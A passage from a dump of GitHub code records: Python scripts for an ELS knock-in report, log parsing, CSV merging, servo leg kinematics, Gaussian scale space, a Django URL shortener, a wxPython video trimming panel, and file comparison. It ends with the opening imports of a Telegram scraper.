issue_greeks_neoneo_swap WHERE 일자='%s') B\nON A.운용코드=B.운용코드\nWHERE A.상환일=0 \nAND A.종류 in (\"StepDown\", \"MonthlyStepDown\", \"StepDownNewHeart\", \"LizardStepDown\")\nAND B.액면금액>0\n\"\"\" % (dstr)\n\ncurs.execute(sql1)\nfields = [d[0] for d in curs.description]\n \n# 데이타 Fetch\nissue = curs.fetchall()\nidata = pd.DataFrame(np.array(issue), columns=fields)\n\nd1, d2 = [], []\nfor i in range(len(idata)):\n \n #기초자산기준가 / 통화\n sql = \"\"\"SELECT ParamValue FROM eqt_drvs.issue_param_short\n WHERE 운용코드='%s' AND Subcode=1 \n AND ParamName in ('할인금리', '기초자산1_기준가', '기초자산2_기준가', '기초자산3_기준가','stepdown_haski', 'StepDown_KIB') \n \"\"\" % (idata['운용코드'][i])\n curs.execute(sql)\n temp = curs.fetchall()\n temp = tuple([x[0] for x in temp])\n d2.append(temp)\n \n# Connection 닫기\nconn.close()\n\nnotional = {'U180':[], 'SPX':[], 'HSCEI':[], 'SX5E':[], 'NKY Index':[]}\ncode = {'U180':[], 'SPX':[], 'HSCEI':[], 'SX5E':[], 'NKY Index':[]}\ns0 = {'U180':0, 'SPX':0, 'HSCEI':0, 'SX5E':0, 'NKY Index':0}\nfor i in range(len(idata)):\n if d2[i][0].strip().lower()==\"no\" and d2[i][1]!=\"0\":\n x = d2[i][1].replace('%','').replace(' ','').split('/')\n if str(type(x))==\"\":\n x = x[0]\n kib = float(x)\n kib = kib/100.0 if kib>1 else kib\n for j in range(idata['기초자산수'][i]):\n notional[idata[\"기초자산코드%d\"%(j+1)][i]].append(\\\n (float(idata['액면금액'][i]), kib*float(d2[i][2+j]) / idata[\"현재가%d\"%(j+1)][i]))\n s0[idata[\"기초자산코드%d\"%(j+1)][i]]=idata[\"현재가%d\"%(j+1)][i]\n code[idata[\"기초자산코드%d\"%(j+1)][i]].append(idata[\"운용코드\"][i])\n\nrg = np.arange(1.0,0.0,-0.05)\nres = pd.DataFrame(np.zeros((len(rg)-1,len(notional.keys()))), index=rg[1:], columns=notional.keys())\nfor i in notional.keys():\n x = np.array(notional[i])\n c = np.array(code[i])\n for j in range(len(rg)-1):\n sel = (x[:,1]>rg[j+1]) * (x[:,1]<=rg[j])\n res[i][j] = sum(x[sel,0])\n if i==\"HSCEI\":\n print(c[sel])\n\nres.loc['tot'] = res.sum()\ns0 = pd.DataFrame(s0, index=[\"Cur.level\"],columns=s0.keys())\nres = s0.append(res)\nres.to_excel(\"KI_LEVEL_%s.xlsx\"%(dstr))\n\n \n \n \n \n \n \n \n \n \n \n \n ","repo_name":"paracats/MyQuantLib","sub_path":"QL/ELSDB/ELS_KI_LEVEL.py","file_name":"ELS_KI_LEVEL.py","file_ext":"py","file_size_in_byte":3603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11565384635","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 12 15:10:39 2019\n\n@author: kevin_y_kuo\n\"\"\"\n\nimport os\nimport re\n\n#print r\"\\n\"\n\n\ndef matchDate(line):\n matchThis = \"\"\n matched = re.match(r'\\d\\d\\d\\d/\\d\\d/\\d\\d\\ \\d\\d:\\d\\d:\\d\\d',line) # 2018/03/14 13:53:18.266\n if matched:\n matchThis = line\n else:\n matchThis = \"NONE\"\n return matchThis\n\n\ndef getMdate(file):\n import time\n\n # os.stat return properties of a file\n tmpTime = time.localtime(os.stat(file).st_mtime)\n return time.strftime('%Y%m%d', tmpTime)\n\n\n\nlogDir = \"/Users/kevin_y_kuo/Documents/Log/\"\noutputDir = '/Users/kevin_y_kuo/Documents/Thread/'\n\n\n#%%\n# 讀取檔案修改日期\nimport time \n#import os\n\ndate_file_list = []\nfor f in os.scandir(logDir):\n #form = f.name.split('.')[1]\n if f.name.endswith(\".log\"):\n print(f.name)\n t=os.stat(f)\n lastmod_date = time.localtime(t.st_mtime) #最後修改日期時間\n print(time.strftime('%Y-%m-%d,%H:%M:%S', lastmod_date))\n date_file_tuple = lastmod_date, f.name\n date_file_list.append(date_file_tuple)\ndate_file_list.sort()\n#print(date_file_list[0][1])\n\n\n\n#%%\n# 依照時間日期重新命名並排序\nx = 0\nfor sfile in date_file_list:\n NewFileName = 
str(x).zfill(3) + '-' + sfile[1]\n os.rename(logDir+sfile[1],logDir+NewFileName)\n x += 1\n\n\n\n\n#%%\n# Compare all the log files and collect the distinct thread IDs\nmatrix_str = \"\"\nmatrix_list = []\ncount = 0\nfor log in os.listdir(logDir):\n if log == \".DS_Store\":\n continue\n else:\n with open(logDir+log,'r', encoding=\"utf-16\") as f:\n for line in f:\n line = matchDate(line)\n if line == \"NONE\":\n continue\n else:\n new_line = line.strip().split(\",\")[1:2] # extract the [process:thread] part\n str_line = \",\".join(new_line) \n if count == 0:\n matrix_str += str_line\n matrix_list.append(str_line)\n count += 1 \n if str_line in matrix_str:\n continue\n else:\n matrix_str += str_line\n matrix_list.append(str_line)\n\n\n#%%\n\nimport sys\n# Create one output file per thread ID\nfor thread in matrix_list: \n output = sys.stdout\n sys.stdout = open(outputDir+thread+'.txt', 'w')\n for log in os.listdir(logDir):\n if log == \".DS_Store\":\n continue\n else:\n with open(logDir+log,'r', encoding=\"utf-16\") as f:\n for line in f:\n if thread in line:\n print(line)\n sys.stdout.close() # ordinary file object\n sys.stdout = output\n\n \n \n\n#%% \n'''\npath_debug = '/Users/kevin_y_kuo/Documents/Log/Amsp_LocalDebugLog.log'\n\n#test = []\nmatrix = \"\"\ncount = 0\nwith open(path_debug,'r', encoding=\"utf-16\") as f:\n for line in f:\n line = matchDate(line)\n #test.append(line)\n if line == \"NONE\":\n continue\n else:\n new_line = line.strip().split(\",\")[1:2]\n str_line = \",\".join(new_line) \n if count == 0:\n matrix += str_line\n count += 1 \n if str_line in matrix:\n continue\n else:\n matrix += str_line\n''' \n\n","repo_name":"KevinKuo149/Log-Parser","sub_path":"thread_classifier.py","file_name":"thread_classifier.py","file_ext":"py","file_size_in_byte":3442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16776772805","text":"#!/usr/bin/env python3\n\n\"\"\" This file is here to merge individual csv files into one file\nThe csv files in a directory are read.\nThis assumes they have the same column headers.\nDue to these files being generated by the same script this is true,\nbut this program does no checking to verify this currently. 
\"\"\"\n\nimport os\nimport csv\nimport sys\n\ninput_path = sys.argv[1]\noutput_file_name = sys.argv[2]\n\n\n\nwith open(output_file_name, 'w', newline='') as outfile:\n\tfieldnames = ['objID', 'ra', 'dec', 'l', 'b', 'dered_u', 'dered_g', 'dered_r', 'dered_i', 'dered_z']\n\twriter = csv.DictWriter(outfile, fieldnames=fieldnames)\n\t\n\twriter.writeheader()\n\tfor root, dirs, files in os.walk(input_path):\n\t\tfor file in files:\n\t\t\tif file.endswith(\".csv\"):\n\t\t\t\t\twith open(file) as csvfile:\n\t\t\t\t\t\tprint (file)\n\t\t\t\t\t\treader = csv.DictReader(csvfile)\n\t\t\t\t\t\tfor row in reader:\n\t\t\t\t\t\t\tobjID = row['objID']\n\t\t\t\t\t\t\tra = row['ra']\n\t\t\t\t\t\t\tdec = row['dec']\n\t\t\t\t\t\t\tl = row['l']\n\t\t\t\t\t\t\tb = row['b']\n\t\t\t\t\t\t\tdered_u = row['dered_u']\n\t\t\t\t\t\t\tdered_g = row['dered_g']\n\t\t\t\t\t\t\tdered_r = row['dered_r']\n\t\t\t\t\t\t\tdered_i = row['dered_i']\n\t\t\t\t\t\t\tdered_z = row['dered_z']\n\t\t\t\t\t\t\t#print(objID)\n\t\t\t\t\t\t\t#print('{0}: ra={1}, dec={2}, dered_g={3}, dered_r={4}'.format(objID, ra, dec, dered_g, dered_r))\n\t\t\t\t\t\t\twriter.writerow({\n\t\t\t\t\t\t\t\t'objID' : objID, \n\t\t\t\t\t\t\t\t'ra':ra, \n\t\t\t\t\t\t\t\t'dec':dec, \n\t\t\t\t\t\t\t\t'l':l,\n\t\t\t\t\t\t\t\t'b':b,\n\t\t\t\t\t\t\t\t'dered_u':dered_u,\n\t\t\t\t\t\t\t\t'dered_g':dered_g,\n\t\t\t\t\t\t\t\t'dered_r':dered_r,\n\t\t\t\t\t\t\t\t'dered_i':dered_i,\n\t\t\t\t\t\t\t\t'dered_z':dered_z})\n\t\t\t\t\t\n\t\t\t\t\t\t \n\n\t\t\t\t\t\t\t\n#objID,ra,dec,l,b,dered_u,dered_g,dered_r,dered_i,dered_z\n\n","repo_name":"Jeffery-M-Thompson/Astronomy_Tools","sub_path":"mergeCSV.py","file_name":"mergeCSV.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27043628452","text":"# Simple demo of of the PCA9685 PWM servo/LED controller library.\n# This will move channel 0 from min to max position repeatedly.\n# Author: Tony DiCola\n# License: Public Domain\nfrom __future__ import division\nimport time\nimport Adafruit_PCA9685\nimport time\nimport board\nimport busio\nimport math\nimport numpy\nimport adafruit_ads1x15.ads1015 as ADS\nfrom adafruit_ads1x15.analog_in import AnalogIn\n\n# Uncomment to enable debug output.\n#import logging\n#logging.basicConfig(level=logging.DEBUG)\n# Initialise the PCA9685 using the default address (0x40).\npwm = Adafruit_PCA9685.PCA9685()\ni2c = busio.I2C(board.SCL,board.SDA)\n\n#pwm1 = Adafruit_PCA9685.PCA9685(address = 0x41)\n# Alternatively specify a different address and/or bus:\n# pwm = Adafruit_PCA9685.PCA9685(address=0x41, busnum=2)\n # Configure min and max servo pulse lengths\n\n# Initialise the PCA9685 using the default address (0x40).\n\n# Create the ADC object using the I2C bus\n# Helper function to make setting a servo pulse width simpler.\nads = ADS.ADS1015(i2c, address = 0x40)\nchan = AnalogIn(ads,ADS.P0)\nads.gain = 1\n#ads1 = ADS.ADS1015(i2c, address = 0x41)\n#chan1 = AnalogIn(ads1, ADS.P0)\n#ads1.gain = 1\ndef set_servo_pulse(channel, pulse):\n pulse_length = 1000000 # 1,000,000 us per second\n pulse_length //= 60 # 60 Hz\n print('{0}us per period'.format(pulse_length))\n pulse_length //= 4096 # 12 bits of resolution\n print('{0}us per bit'.format(pulse_length))\n pulse *= 1000\n pulse //= pulse_length\n pwm.set_pwm(channel, 0, pulse)\n\npwm.set_pwm_freq(220)\n#pwm1.set_pwm_freq(220)\nprint('Moving servo on channel 0, press Ctrl-C to quit...')\nwhile True:\n# Move servo on channel O between extremes.\n '''\n 
#driver 1 base joints\n pwm.set_pwm(0,0,1400)\n pwm.set_pwm(2,0,1400)\n pwm.set_pwm(4,0,1400)\n\n #driver 1 hip joints\n pwm.set_pwm(6,0,1900)\n pwm.set_pwm(8,0,1900)\n pwm.set_pwm(10,0,1900)\n\n #driver 2 base joints\n pwm1.set_pwm(0,0,1400)\n pwm1.set_pwm(2,0,1400)\n pwm1.set_pwm(4,0,1400)\n\n #driver 2 hip joints\n pwm1.set_pwm(6,0,1900)\n pwm1.set_pwm(8,0,1900)\n pwm1.set_pwm(10,0,1825)\n \n #driver 1 knee joints\n pwm.set_pwm(12,0,1525)\n pwm.set_pwm(14,0,1500)\n pwm.set_pwm(15,0,1500)\n \n #driver 2 knee joints\n pwm1.set_pwm(14,0,1375)\n pwm1.set_pwm(12,0,1350) \n pwm1.set_pwm(15,0,1450)\n time.sleep(5)\n '''\n c = 17.2 #20.1\n d = 25.5 #20.1\n b = 11 #10.1\n alpha = 0#-21 * 3.1415 / 180\n avec = [-5,0,-0.1]\n avecproj = [-5,0,0]\n cfactor = 0.91428\n for i in range(0, 628):\n \n yt = 5*math.sin(0.01*i);#was 10\n backstep = 200*math.sin(0.01*(i+157));\n rvec = [-25,yt,-40] # The desired neutral position\n rvecproj = [-15,yt,0] # Projection of rvec to normal vector\n lvecproj = numpy.subtract(rvecproj,avecproj)\n nlvec = numpy.linalg.norm(lvecproj)\n nrvec = numpy.linalg.norm(rvecproj)\n th1chk = -avec[0]*yt # Check the sign of theta 1\n \n #solve for theta 1 \n theta1 = math.degrees(math.acos((avecproj[0]**2+nlvec**2-nrvec**2)/(2*math.fabs(avecproj[0])*nlvec))) \n \n if th1chk > 0:\n theta1 = 180 - theta1\n theta1 = math.fabs(360-theta1)\n signal1 = int((theta1-180)/cfactor)\n else:\n theta1 = theta1 + 180\n theta1 = math.fabs(360-theta1)\n signal1 = int((theta1+180)/cfactor)\n\n bvec = numpy.add(avec,((numpy.multiply([math.cos(math.radians(180+theta1))*math.cos(alpha),math.sin(math.radians(180+theta1))*math.cos(alpha),math.sin(alpha)],b))))\n\n #print((numpy.multiply([math.cos(math.radians(180+theta1))*math.cos(alpha),math.sin(math.radians(180+theta1))*math.cos(alpha),math.sin(alpha)],b)))\n #print((c**2 + d**2 - (numpy.linalg.norm(numpy.subtract(bvec,rvec)))**2)/(2*c*d))\n #print(1/(2*c*d)) \n\n theta3 = math.degrees(math.acos((c**2 + d**2 - (numpy.linalg.norm(numpy.subtract(bvec,rvec)))**2)/(2*c*d))) - 180\n theta2 = math.degrees(math.acos((c**2 + (numpy.linalg.norm(numpy.subtract(bvec, rvec))**2-d**2))/(2*c*numpy.linalg.norm(numpy.subtract(bvec,rvec)))))+math.degrees(math.acos((b**2+(numpy.linalg.norm(numpy.subtract(bvec,rvec)))**2-(numpy.linalg.norm(numpy.subtract(avec,rvec))**2))/(2*b*(numpy.linalg.norm(numpy.subtract(bvec,rvec))))))-180 \n #theta3 = -1*theta3\n theta2 = -1*theta2\n # WORKS print((2*c*numpy.linalg.norm(numpy.subtract(bvec,rvec))))\n signal2 = int(theta2/cfactor*(16/3))\n if backstep < 0:\n set1offset = -30\n set2offset = 0\n else:\n set1offset = 0\n set2offset = -30\n # WORKS print( math.degrees(math.acos((c**2 + (numpy.linalg.norm(numpy.subtract(bvec, rvec))**2-d**2))/(2*c*numpy.linalg.norm(numpy.subtract(bvec,rvec))))))\n\n #print(numpy.linalg.norm(numpy.subtract(bvec,rvec)))\n #WORKS add () print((c**2 + (numpy.linalg.norm(numpy.subtract(bvec, rvec))**2-d**2)))\n #print(bvec)\n #print(theta2)\n offset = 0 \n signal3 = int(theta3/cfactor*16/3*1.55) # USE\n #pwm.set_pwm(0, 0, int(1400 - 40 * math.sin(0.01 * i)))\n #pwm.set_pwm(2, 0, int(1400 - 40 * math.sin(0.01 * i)))\n pwm.set_pwm(0, 0, 1200+signal1) # USE\n #pwm.set_pwm(6, 0, 1200+signal1)\n #pwm.set_pwm(6, 0, 1300+signal1)\n #pwm1.set_pwm(0, 0, int(1400 - 40 * math.sin(0.01 * i)))\n #pwm1.set_pwm(2, 0, int(1400 - 40 * math.sin(0.01 * i)))\n #pwm1.set_pwm(2, 0, int(1400 + 40 * math.sin(0.01 * i)))\n \n pwm.set_pwm(2, 0, 1400+ signal2 + set1offset) # USE\n print(1400 + signal2)\n #pwm.set_pwm(8, 0, int(1875 
- 125 * math.sin(0.01 * i)))\n #pwm.set_pwm(10, 0, int(1875 - 125 * math.sin(0.01 * i)))\n #pwm1.set_pwm(6, 0, int(1875 - 125 * math.sin(0.01 * i)))\n #pwm1.set_pwm(8, 0, int(1875 - 125 * math.sin(0.01 * i)))\n #pwm1.set_pwm(10, 0, int(1875 -125 * math.sin(0.01 * i)))\n #pwm.set_pwm(2, 0, 1940)\n #pwm.set_pwm(12, 0, int(1525 - 70 * math.sin(0.01 * i)))\n #pwm.set_pwm(14, 0, int(1500 - 70 * math.sin(0.01 * i)))\n pwm.set_pwm(4, 0, 1450- signal3) # USE\n #pwm1.set_pwm(12, 0, int(1350 - 70 * math.sin(0.01 * i)))\n #pwm1.set_pwm(14, 0, int(1375 - 70 * math.sin(0.01 * i)))\n #pwm1.set_pwm(15, 0, int(1450 - 70 * math.sin(0.01 * i)))\n \n #print(signal3 + 1540)\n #print(c**2 + d**2 - (numpy.linalg.norm(numpy.subtract(bvec,rvec)))**2)\n #print((2*c*d))\n #print(signal3)\n \n #print(\"Theta 1 = \", theta1)\n #print(\"Theta 2 = \", theta2)\n #print(\"Theta 3 = \", theta3)\n \n time.sleep(0.02)\n #print(\"{:>5}\\t{:>5.3f}\".format(chan.value,chan.voltage),\" \",1000-i)\n #pwm.set_pwm(0,0,500)\n #time.sleep(10)\n #pwm.set_pwm(0,0,2400)\n #time.sleep(10)\n ##pwm.set_p:wm(0,0,500)\n","repo_name":"shambhavi12001/ams","sub_path":"adc_motor_test.py","file_name":"adc_motor_test.py","file_ext":"py","file_size_in_byte":6931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21557416487","text":"# This function returns a single octave in scale-space. The inputs to this\n# function are:\n#\n# img - An MxN array, representing a grayscale image or a squared DoG array\n# \n# n - The number of layers in the octave\n#\n# sigma_init - The first sigma value for the first layer in the octave\n#\n# k_init - the scaling factor for sigma\n#\n# This function returns the octave of scale-space images.\n\n# import the NumPy library\n\nimport numpy as np\n\n# import the get_gaussian_kernel() function\n\nfrom get_gaussian_kernel import get_gaussian_kernel\n\n# import the conv_FFT() function\n\nfrom conv_FFT import conv_FFT\n\ndef get_ss_octave(img,n=5,sigma_init=1.6,k_init=np.sqrt(2)):\n \n # generate the k values for the octave\n \n k = np.power(k_init,np.arange(n))\n \n # generate the sigma values for the octave\n \n sigmas = list(sigma_init*k)\n \n # initialize list to store scale-space octave layers\n \n scale_space = []\n \n for sigma in sigmas: # loop through each layer\n \n # compute the new gaussian kernel\n \n gaussian_kernel = get_gaussian_kernel(sigma)\n \n # filter the image with the new gaussian kernel\n \n g_layer = conv_FFT(img,gaussian_kernel,img_filter=False)\n \n # append result to list\n \n scale_space.append(g_layer)\n \n return scale_space\n","repo_name":"mhdadk/Image-Blob-Detection","sub_path":"src/get_ss_octave.py","file_name":"get_ss_octave.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6742209312","text":"from django.shortcuts import render\nfrom django.shortcuts import redirect\nfrom .forms import *\nfrom django.shortcuts import get_object_or_404\nfrom .forms import UserCreationForm\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib import messages\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.contrib.auth import login, authenticate\nfrom django.contrib.auth.decorators import login_required\n\n\n@login_required(login_url='login')\ndef create_short(request):\n form = CreateUrlForm()\n links = Url.objects.filter(user=request.user)\n if 
request.method == 'POST':\n form = CreateUrlForm(request.POST)\n if form.is_valid():\n url = form.save(commit=False)\n url.user = request.user\n url.save()\n url = form.save()\n url.generate_short_url()\n print(url.short)\n\n print(\"success\")\n context = {\n 'links': links,\n 'form': form,\n }\n return render(request, 'service/home.html', context)\n\n\ndef page_redirect(request, url):\n url_object = get_object_or_404(Url, short=url)\n if url_object.active is True:\n response = redirect(url_object.long)\n response.status_code = 307\n return response\n else:\n context = {}\n return render(request, 'service/not_found.html', context)\n\n\ndef register_page(request):\n if request.method == 'POST':\n form = UserRegistrationForm(request.POST)\n if form.is_valid():\n form.save()\n messages.success(\n request, f'Your account has been created. You can log in now!')\n return redirect('login')\n else:\n form = UserRegistrationForm()\n context = {'form': form}\n return render(request, 'service/register_user.html', context)\n\n\ndef login_page(request):\n if request.method == \"POST\":\n form = AuthenticationForm(request, data=request.POST)\n if form.is_valid():\n username = form.cleaned_data.get('username')\n password = form.cleaned_data.get('password')\n user = authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n messages.info(request, f\"You are now logged in as {username}.\")\n return redirect(\"home\")\n else:\n messages.error(request, \"Invalid username or password.\")\n else:\n messages.error(request, \"Invalid username or password.\")\n form = AuthenticationForm()\n return render(request=request, template_name=\"service/login_user.html\", context={\"login_form\": form})\n\n\ndef logout_user(request):\n \"\"\" Log outs user\"\"\"\n logout(request)\n return redirect('login')\n\n\ndef delete_url(request, url):\n url = Url.objects.get(short=url)\n if request.method == \"POST\":\n url.delete()\n return redirect('/')\n context = {}\n return render(request, 'service/home.html', context)\n\n\ndef toggle_url(request, url):\n url = Url.objects.get(short=url)\n if request.method == \"POST\":\n url.toggle_active()\n return redirect('/')\n context = {}\n return render(request, 'service/home.html', context)\n\n\ndef change_expiration_time(request, url, datetime):\n url = Url.objects.get(short=url)\n if request.method == \"POST\":\n url.set_datetime(datetime)\n return redirect('/')\n context = {}\n return render(request, 'service/home.html', context)\n","repo_name":"balbazauras/backend-homework","sub_path":"service/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19212597331","text":"import wx\nimport cv2\nimport pandas as pd\n\n\nclass VideoPanel(wx.Panel):\n def __init__(self, parent):\n super().__init__(parent)\n\n self.ind = -1\n\n main_sizer = wx.BoxSizer(wx.VERTICAL)\n\n self.list_ctrl = wx.ListCtrl(self, size=(-1, 500),\n style=wx.LC_REPORT | wx.BORDER_SUNKEN)\n\n self.list_ctrl.InsertColumn(0, 'Location', width=100)\n self.list_ctrl.InsertColumn(1, 'Start', width=100)\n self.list_ctrl.InsertColumn(2, 'Stop', width=100)\n main_sizer.Add(self.list_ctrl, 0, 0, 5)\n self.SetSizer(main_sizer)\n\n self.list_ctrl.Bind(wx.EVT_KEY_UP, self.handle_key_up)\n self.list_ctrl.Bind(wx.EVT_KEY_DOWN, self.handle_key_down)\n\n\n self.current_time_text = wx.StaticText(self, -1, label=\"00:00:000\", pos = (520, 480))\n self.start_time_text = 
wx.StaticText(self, -1, label=\"00:00:000\", pos = (450, 480))\n        self.end_time_text = wx.StaticText(self, -1, label=\"00:00:000\", pos=(590, 480))\n        self.current_frame_text = wx.StaticText(self, -1, label=\"0\", pos=(520, 500))\n        self.start_frame_text = wx.StaticText(self, -1, label=\"0\", pos=(450, 500))\n        self.end_frame_text = wx.StaticText(self, -1, label=\"0\", pos=(590, 500))\n        self.trim_end_button = wx.Button(self, -1, label=\"Trim end\", pos=(400, 520))\n        self.trim_start_button = wx.Button(self, -1, label=\"Trim start\", pos=(300, 520))\n        self.delete_button = wx.Button(self, -1, label=\"Delete\", pos=(500, 520))\n        self.DI_text = wx.StaticText(self, -1, label=\"DI:\", pos=(600, 520))\n\n        self.play_video = False\n        self.reverse = False\n        self.key_down = False\n        self.render = False\n        self.Bind(wx.EVT_KEY_UP, self.handle_key_up)\n        self.Bind(wx.EVT_KEY_DOWN, self.handle_key_down)\n\n        self.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self.handle_select_timestamp, self.list_ctrl)\n\n        self.trim_start_button.Bind(wx.EVT_BUTTON, self.trim_start)\n        self.trim_end_button.Bind(wx.EVT_BUTTON, self.trim_end)\n\n        self.delete_button.Bind(wx.EVT_BUTTON, self.delete_timestamp)\n\n\n    def trim_start(self, event):\n        if self.ind == -1:\n            return\n\n        self.data[self.ind][\"start\"] = self.current_frame\n\n        self.update(self.data, self.ind)\n        self.Refresh()\n\n    def trim_end(self, event):\n        if self.ind == -1:\n            return\n\n        self.data[self.ind][\"stop\"] = self.current_frame\n\n        self.update(self.data, self.ind)\n        self.Refresh()\n\n    def delete_timestamp(self, event):\n        if self.ind == -1:\n            return\n        self.pause()\n        self.reverse = False\n\n        del self.data[self.ind]\n\n        self.ind -= 1\n        self.update(self.data, self.ind)\n        self.Refresh()\n\n\n    def save_timestamps(self, filepath):\n\n        # Convert data to timestamps\n        save_data = []\n\n        for timestamp in self.data:\n            new_timestamp = timestamp\n            new_timestamp[\"start\"] = self.video.format_time(self.video.timestamp(int(timestamp[\"start\"])))\n            new_timestamp[\"stop\"] = self.video.format_time(self.video.timestamp(int(timestamp[\"stop\"])))\n\n            save_data.append(new_timestamp)\n\n        df = pd.DataFrame(save_data)\n        print(df)\n        df.to_csv(filepath)\n\n\n    def update(self, data, ind=-1):\n        self.data = data\n        self.list_ctrl.ClearAll()\n        self.list_ctrl.InsertColumn(0, 'Location', width=100)\n        self.list_ctrl.InsertColumn(1, 'Start', width=100)\n        self.list_ctrl.InsertColumn(2, 'Stop', width=100)\n\n        index = 0\n        for timestamp in data:\n            self.list_ctrl.InsertItem(index, timestamp[\"location\"])\n            self.list_ctrl.SetItem(index, 1, str(timestamp[\"start\"]))\n            self.list_ctrl.SetItem(index, 2, str(timestamp[\"stop\"]))\n            index += 1\n\n        # After loading timestamp, select first data\n        if ind != -1:\n            self.ind = ind\n            self.list_ctrl.Select(ind)\n        else:\n            self.ind = 0\n            self.list_ctrl.Select(0)\n\n        # If we have a video, select timeframe\n        if hasattr(self, \"video\"):\n            self.render = True\n            self.set_timeframe(data[self.ind][\"start\"], data[self.ind][\"stop\"])\n\n    def set_timeframe(self, start_frame, end_frame):\n        self.start_frame = int(start_frame)\n        self.end_frame = int(end_frame)\n        self.current_frame = int(start_frame)\n\n        self.render_text()\n\n    def calculate_DI(self):\n        new = 0\n        old = 0\n        for timestamp in self.data:\n            if timestamp['location'][1] == \"L\":\n                new += self.video.timestamp(int(timestamp[\"stop\"])) - self.video.timestamp(int(timestamp[\"start\"]))\n            else:\n                old += self.video.timestamp(int(timestamp[\"stop\"])) - self.video.timestamp(int(timestamp[\"start\"]))\n        return new / (new + old)\n\n\n    def 
render_text(self):\n self.start_frame_text.SetLabel(str(self.start_frame))\n self.current_frame_text.SetLabel(str(self.current_frame))\n self.end_frame_text.SetLabel(str(self.end_frame))\n self.start_time_text.SetLabel(self.video.format_time(self.video.timestamp(self.start_frame)))\n self.current_time_text.SetLabel(self.video.format_time(self.video.timestamp(self.current_frame)))\n self.end_time_text.SetLabel(self.video.format_time(self.video.timestamp(self.end_frame)))\n\n self.DI_text.SetLabel(\"{0:.2f}\".format(self.calculate_DI()))\n\n\n\n # on loading video, check if file is loaded\n def load_video(self, video):\n self.play_video = False\n self.reverse = False\n self.render = False\n self.video = video\n\n\n if hasattr(self, 'timer'):\n self.timer.Stop()\n\n print(\"loaded video\")\n if hasattr(self, \"data\"):\n print(\"has data\")\n # After loading timestamp, select first data\n self.list_ctrl.Select(self.ind)\n\n # If we have a video, select timeframe\n self.set_timeframe(self.data[self.ind][\"start\"], self.data[self.ind][\"stop\"])\n self.render = True\n else:\n self.start_frame = 0\n self.end_frame = 0\n\n self.current_frame = 0\n\n\n f = cv2.cvtColor(video.frames[self.current_frame], cv2.COLOR_BGR2RGB)\n\n self.bmp = wx.Bitmap.FromBuffer(448, 448, f)\n self.Refresh()\n\n self.timer = wx.Timer(self)\n self.timer.Start(1000. / video.fps)\n\n self.Bind(wx.EVT_PAINT, self.OnPaint)\n self.Bind(wx.EVT_TIMER, self.NextFrame)\n\n\n def play(self):\n self.play_video = True\n\n def pause(self):\n self.play_video = False\n\n def handle_key_down(self, event):\n if not hasattr(self, \"video\"):\n return\n\n keycode = event.GetKeyCode()\n\n if self.key_down:\n return\n\n if keycode == 46:\n self.key_down = True\n self.play()\n elif keycode == 44:\n\n self.key_down = True\n self.play()\n self.reverse = True\n\n\n def handle_key_up(self, event):\n if not hasattr(self, \"video\"):\n return\n keycode = event.GetKeyCode()\n\n if keycode == wx.WXK_SPACE:\n if self.key_down:\n return\n if self.play_video:\n self.pause()\n else:\n self.play()\n elif keycode == 46:\n self.key_down = False\n self.pause()\n elif keycode == 44:\n self.key_down = False\n\n self.pause()\n self.reverse = False\n\n def handle_select_timestamp(self, event):\n ind = event.Index\n self.ind = ind\n # If we have a video, select timeframe\n if hasattr(self, \"video\"):\n self.play_video = False\n self.reverse = False\n self.set_timeframe(self.data[ind][\"start\"], self.data[ind][\"stop\"])\n self.render = True\n f = cv2.cvtColor(self.video.frames[self.current_frame], cv2.COLOR_BGR2RGB)\n self.bmp.CopyFromBuffer(f)\n self.Refresh()\n\n\n\n\n def OnPaint(self, evt):\n dc = wx.BufferedPaintDC(self)\n dc.Clear()\n if self.render:\n dc.DrawBitmap(self.bmp, 330, 0)\n\n def NextFrame(self, event):\n\n if self.play_video is False:\n return\n\n if self.reverse:\n if self.current_frame > self.start_frame:\n self.current_frame -= 1\n else:\n self.current_frame = self.end_frame - 1\n else:\n if self.current_frame < self.end_frame - 1:\n self.current_frame += 1\n else:\n self.current_frame = self.start_frame\n\n f = cv2.cvtColor(self.video.frames[self.current_frame], cv2.COLOR_BGR2RGB)\n self.bmp.CopyFromBuffer(f)\n self.Refresh()\n\n # Render timestamp + frame number on screen\n self.render_text()\n","repo_name":"yixiongsun/objectlocationmemory","sub_path":"panels.py","file_name":"panels.py","file_ext":"py","file_size_in_byte":8968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
+{"seq_id":"17149189796","text":"def compare_files(file1_path, file2_path):\n with open(file1_path, 'r') as file1, open(file2_path, 'r') as file2:\n i =0\n while True:\n char1 = file1.read(1)\n char2 = file2.read(1)\n i+=1\n if char1 != char2:\n print(char1)\n print(char2)\n print(i)\n return False\n if not char1:\n return True\n \n\nif compare_files('out_file_name.txt', 'temp.txt'):\n print('The files match')\nelse:\n print('The files do not match')","repo_name":"tejasbv/CS6348","sub_path":"myProgram/checker.py","file_name":"checker.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39431947318","text":"import datetime\nimport logging\nimport os\nimport pandas as pd\nimport shutil\nfrom data_model import CHATS_COLUMNS, SCANNED_COLUMNS, NODES_COLUMNS, EDGES_COLUMNS, MESSAGES_COLUMNS\nfrom telegram import SyncTelegramClient\nfrom telethon.errors.rpcerrorlist import ChannelPrivateError\nimport traceback\nfrom tqdm import tqdm\n\nfrom chat_lists import 